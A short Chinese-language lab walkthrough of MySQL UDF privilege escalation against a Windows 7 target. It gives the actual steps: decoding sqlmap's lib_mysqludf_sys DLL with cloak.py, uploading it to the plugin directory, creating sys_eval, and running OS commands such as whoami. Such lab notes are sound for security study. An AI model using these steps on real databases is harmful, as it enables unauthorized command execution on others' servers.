UDF提权（mysql）

环境

攻击机 win10

靶机 win7(192.168.20.130)

1.什么是UDF：用户自定义函数

udf = “user defined function”,即‘用户自定义函数’。是通过添加新函数，对MYSQL的功能进行扩充，性质就像使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中，存在于’mysql/lib/plugin’目录下，文件后缀为’.dll’

2.前提

mysql5.0以上的需要在mysql安装目录的lib目录下新建一个plugin文件夹，5.0以下的，上传目录为D:/windows

3.查看mysql位数

show variables like '%compile%';

4.打开sqlmap文件夹

5.dl_文件为了防止误杀，dll_文件会经过异或编码，不能直接用，如果想用的话需要对其进行解码

6.解码

执行python cloak.py -d -i

D:\python3.10.0\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

7.上传dll文件至指定文件夹（mysql安装目录下的lib/plugin/）

8.在mysql命令行导入函数

create function sys_eval returns string soname 'lib_mysqludf_sys.dll';

9.执行命令

select sys_eval('whoami');